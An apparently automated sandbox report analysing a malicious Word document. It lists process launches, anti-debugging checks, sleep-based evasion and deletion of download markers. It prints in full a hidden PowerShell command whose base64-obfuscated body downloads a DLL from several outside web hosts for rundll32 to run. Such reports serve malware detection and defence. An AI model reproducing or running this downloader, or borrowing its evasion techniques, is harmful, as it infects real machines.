nACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008085 push ecx; ret		7_2_10008098
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004ADA push ecx; ret		7_2_10004AED

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Shuwftk\rwhokf.exo:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Gfhmd\pcib.aey:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_001F109C FindFirstFileW,

13_2_001F109C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_100011C0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_1000C620

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021C4FF mov eax, dword ptr fs:[00000030h]	7_2_0021C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032C4FF mov eax, dword ptr fs:[00000030h]	8_2_0032C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001FC4FF mov eax, dword ptr fs:[00000030h]	9_2_001FC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FC4FF mov eax, dword ptr fs:[00000030h]	10_2_001FC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EC4FF mov eax, dword ptr fs:[00000030h]	11_2_002EC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021C4FF mov eax, dword ptr fs:[00000030h]	12_2_0021C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FC4FF mov eax, dword ptr fs:[00000030h]	13_2_001FC4FF

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_10001B30

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_10007F07

